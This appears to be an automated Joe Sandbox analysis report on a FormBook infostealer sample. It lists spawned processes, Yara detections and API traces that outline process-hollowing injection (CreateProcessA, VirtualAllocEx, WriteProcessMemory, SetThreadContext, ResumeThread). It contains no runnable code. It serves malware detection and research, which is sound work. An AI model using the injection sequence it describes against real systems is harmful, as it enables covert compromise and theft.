                                                                                                        Commandline:"C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe"
                                                                                                        Imagebase:0x5b0000
                                                                                                        File size:140'800 bytes
                                                                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4589607610.0000000003BF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                        Reputation:high
                                                                                                        Has exited:false

                                                                                                        Target ID:8
                                                                                                        Start time:08:36:59
                                                                                                        Start date:02/12/2024
                                                                                                        Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\Windows\SysWOW64\wscript.exe"
                                                                                                        Imagebase:0xc60000
                                                                                                        File size:147'456 bytes
                                                                                                        MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.4581614710.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.4590637504.0000000004660000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.4590687371.00000000046B0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        Reputation:high
                                                                                                        Has exited:false

                                                                                                        Target ID:10
                                                                                                        Start time:08:37:13
                                                                                                        Start date:02/12/2024
                                                                                                        Path:C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe"
                                                                                                        Imagebase:0x5b0000
                                                                                                        File size:140'800 bytes
                                                                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.4592454426.0000000004B70000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                        Reputation:high
                                                                                                        Has exited:false

                                                                                                        Target ID:12
                                                                                                        Start time:08:37:26
                                                                                                        Start date:02/12/2024
                                                                                                        Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                        Imagebase:0x7ff728280000
                                                                                                        File size:676'768 bytes
                                                                                                        MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:true


                                                                                                          Execution Graph

                                                                                                          Execution Coverage:11.3%
                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                          Signature Coverage:2%
                                                                                                          Total number of Nodes:304
                                                                                                          Total number of Limit Nodes:20
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2189405147.0000000007C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C50000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7c50000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: fc15907d410f983832f47f673d8d224be107dea8272fd88199507bd4d1867d86
                                                                                                          • Instruction ID: 452339ccd20796d9015310e573419e025bae8841de4e65ebd4bca68c0ba7322d
                                                                                                          • Opcode Fuzzy Hash: fc15907d410f983832f47f673d8d224be107dea8272fd88199507bd4d1867d86
                                                                                                          • Instruction Fuzzy Hash: 83327DB0E00215CFDB58DFA9C8947AEBBF2AFC4300F14856AD809AB395DB319D85CB55
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2189405147.0000000007C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C50000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7c50000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: c8003c96cfa4c345322b4603fa77dcde42e11eb0ec5839b758ae079b85460670
                                                                                                          • Instruction ID: 2c1e03175cb20a40b00a44de1f375b39fa1babdeceab00f03ac6430eb047a074
                                                                                                          • Opcode Fuzzy Hash: c8003c96cfa4c345322b4603fa77dcde42e11eb0ec5839b758ae079b85460670
                                                                                                          • Instruction Fuzzy Hash: 3BC15BB1E00255CFCF14CFA5C880B9ABBB2AF85310F14C5A9D809AB255EB31DAD5CF55
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2189405147.0000000007C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C50000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7c50000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: e583a2c9557d4784b11ee3b224d5f32dc718ce7b5ab13310adc561cbb4f9f744
                                                                                                          • Instruction ID: 72f6b4b9e870d547403b0c98c7b7ea6608eb51fd436d9fbb1841e9e6d5862b17
                                                                                                          • Opcode Fuzzy Hash: e583a2c9557d4784b11ee3b224d5f32dc718ce7b5ab13310adc561cbb4f9f744
                                                                                                          • Instruction Fuzzy Hash: 24C15CB1E00255CFCF14CFA5C88079ABBB2AF89310F14C5AAD809AB255EB31DAD5CF54
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2189405147.0000000007C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C50000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7c50000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 91ffd75debd4150b7d34bfc52a16b72bd20a4982f2ccb2775bbc94bbc683ffa3
                                                                                                          • Instruction ID: 2c1e5d238f613099278ffecf97b74d722bdceb0246ecf2385eb4d0e47dddffa8
                                                                                                          • Opcode Fuzzy Hash: 91ffd75debd4150b7d34bfc52a16b72bd20a4982f2ccb2775bbc94bbc683ffa3
                                                                                                          • Instruction Fuzzy Hash: 5FA1F4B0D05228CFDB18CFA6D844BEEBBB6BF8A300F109169D809B7255DB754A85CF45
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2189405147.0000000007C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C50000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7c50000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 01af5800973f88139a6de6dc5d9c44d3b5fbc9cf475981f09e8a6631c2f2d77b
                                                                                                          • Instruction ID: e51e4a3b4cc23e599fd1c741d14cc8befbd0e2d851a78c8afb0fcec64a9a838d
                                                                                                          • Opcode Fuzzy Hash: 01af5800973f88139a6de6dc5d9c44d3b5fbc9cf475981f09e8a6631c2f2d77b
                                                                                                          • Instruction Fuzzy Hash: 00A1E7B4D05228CFDB18CFA6D8447EEBBB2BF4A300F10916AD809BB255DB754A85CF45
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2174567286.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_13e0000_specification and drawing.jbxd
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2174567286.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_13e0000_specification and drawing.jbxd
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2188222604.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_71d0000_specification and drawing.jbxd
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2188222604.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_71d0000_specification and drawing.jbxd

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                          • GetCurrentProcess.KERNEL32 ref: 013ED5DE
                                                                                                          • GetCurrentThread.KERNEL32 ref: 013ED61B
                                                                                                          • GetCurrentProcess.KERNEL32 ref: 013ED658
                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 013ED6B1
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2174567286.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_13e0000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Current$ProcessThread
                                                                                                          • String ID:
                                                                                                          • API String ID: 2063062207-0

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                          • GetCurrentProcess.KERNEL32 ref: 013ED5DE
                                                                                                          • GetCurrentThread.KERNEL32 ref: 013ED61B
                                                                                                          • GetCurrentProcess.KERNEL32 ref: 013ED658
                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 013ED6B1
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2174567286.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_13e0000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Current$ProcessThread
                                                                                                          • String ID:
                                                                                                          • API String ID: 2063062207-0

                                                                                                          Control-flow Graph

Control-flow graph 45 (figure): entry block 71d9bbc-71d9c5d; block 71d9d57-71d9e11 calls CreateProcessA.
                                                                                                          APIs
                                                                                                          • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 071D9DFE
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2188222604.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_71d0000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateProcess
                                                                                                          • String ID:
                                                                                                          • API String ID: 963392458-0

                                                                                                          Control-flow Graph

Control-flow graph 102 (figure): entry block 71d9bc8-71d9c5d; block 71d9d57-71d9e11 calls CreateProcessA.
                                                                                                          APIs
                                                                                                          • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 071D9DFE
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2188222604.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_71d0000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateProcess
                                                                                                          • String ID:
                                                                                                          • API String ID: 963392458-0

                                                                                                          Control-flow Graph

Control-flow graph 159 (figure): entry block 13eb2b7-13eb2d7; block 13eb500-13eb52b calls GetModuleHandleW.
                                                                                                          APIs
                                                                                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 013EB51E
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2174567286.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_13e0000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: HandleModule
                                                                                                          • String ID:
                                                                                                          • API String ID: 4139908857-0

                                                                                                          Control-flow Graph

Control-flow graph 219 (figure): entry block 13e4544-13e5e99 calls CreateActCtxA.
                                                                                                          APIs
                                                                                                          • CreateActCtxA.KERNEL32(?), ref: 013E5E89
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2174567286.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_13e0000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Create
                                                                                                          • String ID:
                                                                                                          • API String ID: 2289755597-0

                                                                                                          Control-flow Graph

Control-flow graph 236 (figure): entry block 13e5dcc-13e5e99 calls CreateActCtxA.
                                                                                                          APIs
                                                                                                          • CreateActCtxA.KERNEL32(?), ref: 013E5E89
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2174567286.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_13e0000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Create
                                                                                                          • String ID:
                                                                                                          • API String ID: 2289755597-0

                                                                                                          Control-flow Graph

Control-flow graph 252 (figure): entry block 7c57668-7c5767a; block 7c576a2-7c57734 calls CreateIconFromResourceEx.
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2189405147.0000000007C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C50000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7c50000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateFromIconResource
                                                                                                          • String ID:
                                                                                                          • API String ID: 3668623891-0

                                                                                                          Control-flow Graph

                                                                                                          control_flow_graph 264 7c5419c-7c56864 266 7c56866-7c5686c 264->266 267 7c5686f-7c5687e 264->267 266->267 268 7c56880 267->268 269 7c56883-7c568bc DrawTextExW 267->269 268->269 270 7c568c5-7c568e2 269->270 271 7c568be-7c568c4 269->271 271->270
                                                                                                          APIs
                                                                                                          • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,07C567FD,?,?), ref: 07C568AF
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2189405147.0000000007C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C50000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7c50000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: DrawText
                                                                                                          • String ID:
                                                                                                          • API String ID: 2175133113-0

                                                                                                          Control-flow Graph

                                                                                                          control_flow_graph 274 71d9939-71d998e 277 71d999e-71d99dd WriteProcessMemory 274->277 278 71d9990-71d999c 274->278 280 71d99df-71d99e5 277->280 281 71d99e6-71d9a16 277->281 278->277 280->281
                                                                                                          APIs
                                                                                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 071D99D0
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2188222604.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_71d0000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MemoryProcessWrite
                                                                                                          • String ID:
                                                                                                          • API String ID: 3559483778-0

                                                                                                          Control-flow Graph

                                                                                                          control_flow_graph 285 7c56810-7c56864 287 7c56866-7c5686c 285->287 288 7c5686f-7c5687e 285->288 287->288 289 7c56880 288->289 290 7c56883-7c568bc DrawTextExW 288->290 289->290 291 7c568c5-7c568e2 290->291 292 7c568be-7c568c4 290->292 292->291
                                                                                                          APIs
                                                                                                          • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,07C567FD,?,?), ref: 07C568AF
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2189405147.0000000007C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C50000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7c50000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: DrawText
                                                                                                          • String ID:
                                                                                                          • API String ID: 2175133113-0

                                                                                                          Control-flow Graph

                                                                                                          control_flow_graph 295 71d9940-71d998e 297 71d999e-71d99dd WriteProcessMemory 295->297 298 71d9990-71d999c 295->298 300 71d99df-71d99e5 297->300 301 71d99e6-71d9a16 297->301 298->297 300->301
                                                                                                          APIs
                                                                                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 071D99D0
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2188222604.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_71d0000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MemoryProcessWrite
                                                                                                          • String ID:
                                                                                                          • API String ID: 3559483778-0

                                                                                                          Control-flow Graph

                                                                                                          control_flow_graph 305 71d9368-71d93bb 308 71d93bd-71d93c9 305->308 309 71d93cb-71d93fb Wow64SetThreadContext 305->309 308->309 311 71d93fd-71d9403 309->311 312 71d9404-71d9434 309->312 311->312
                                                                                                          APIs
                                                                                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 071D93EE
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2188222604.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_71d0000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ContextThreadWow64
                                                                                                          • String ID:
                                                                                                          • API String ID: 983334009-0

                                                                                                          Control-flow Graph

                                                                                                          control_flow_graph 316 71d9a29-71d9abd ReadProcessMemory 320 71d9abf-71d9ac5 316->320 321 71d9ac6-71d9af6 316->321 320->321
                                                                                                          APIs
                                                                                                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 071D9AB0
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2188222604.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_71d0000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MemoryProcessRead
                                                                                                          • String ID:
                                                                                                          • API String ID: 1726664587-0

                                                                                                          Control-flow Graph

                                                                                                          control_flow_graph 325 71d9370-71d93bb 327 71d93bd-71d93c9 325->327 328 71d93cb-71d93fb Wow64SetThreadContext 325->328 327->328 330 71d93fd-71d9403 328->330 331 71d9404-71d9434 328->331 330->331
                                                                                                          APIs
                                                                                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 071D93EE
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2188222604.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_71d0000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ContextThreadWow64
                                                                                                          • String ID:
                                                                                                          • API String ID: 983334009-0
                                                                                                          APIs
                                                                                                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 071D9AB0
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2188222604.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_71d0000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MemoryProcessRead
                                                                                                          • String ID:
                                                                                                          • API String ID: 1726664587-0
                                                                                                          APIs
                                                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 013ED82F
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2174567286.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_13e0000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: DuplicateHandle
                                                                                                          • String ID:
                                                                                                          • API String ID: 3793708945-0
                                                                                                          APIs
                                                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 013ED82F
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2174567286.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_13e0000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: DuplicateHandle
                                                                                                          • String ID:
                                                                                                          • API String ID: 3793708945-0
                                                                                                          APIs
                                                                                                          • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,07C57682,?,?,?,?,?), ref: 07C57727
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2189405147.0000000007C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C50000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7c50000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateFromIconResource
                                                                                                          • String ID:
                                                                                                          • API String ID: 3668623891-0
                                                                                                          APIs
                                                                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 071D98EE
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2188222604.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_71d0000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AllocVirtual
                                                                                                          • String ID:
                                                                                                          • API String ID: 4275171209-0
                                                                                                          APIs
                                                                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 071D98EE
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2188222604.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_71d0000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AllocVirtual
                                                                                                          • String ID:
                                                                                                          • API String ID: 4275171209-0
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2188222604.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_71d0000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ResumeThread
                                                                                                          • String ID:
                                                                                                          • API String ID: 947044025-0
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2188222604.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_71d0000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ResumeThread
                                                                                                          • String ID:
                                                                                                          • API String ID: 947044025-0
                                                                                                          APIs
                                                                                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 013EB51E
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2174567286.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_13e0000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: HandleModule
                                                                                                          • String ID:
                                                                                                          • API String ID: 4139908857-0
                                                                                                          APIs
                                                                                                          • PostMessageW.USER32(?,00000010,00000000,?), ref: 071DC45D
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2188222604.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_71d0000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessagePost
                                                                                                          • String ID:
                                                                                                          • API String ID: 410705778-0
                                                                                                          APIs
                                                                                                          • PostMessageW.USER32(?,00000010,00000000,?), ref: 071DC45D
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2188222604.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_71d0000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessagePost
                                                                                                          • String ID:
                                                                                                          • API String ID: 410705778-0
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2165364135.00000000010ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 010ED000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_10ed000_specification and drawing.jbxd
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2165399802.00000000010FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010FD000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_10fd000_specification and drawing.jbxd
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2165399802.00000000010FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010FD000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_10fd000_specification and drawing.jbxd
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2165364135.00000000010ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 010ED000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_10ed000_specification and drawing.jbxd
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2165399802.00000000010FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010FD000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_10fd000_specification and drawing.jbxd
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2165399802.00000000010FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010FD000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_10fd000_specification and drawing.jbxd
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2165364135.00000000010ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 010ED000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_10ed000_specification and drawing.jbxd
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2165364135.00000000010ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 010ED000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_10ed000_specification and drawing.jbxd
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2188222604.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_71d0000_specification and drawing.jbxd
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2188222604.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
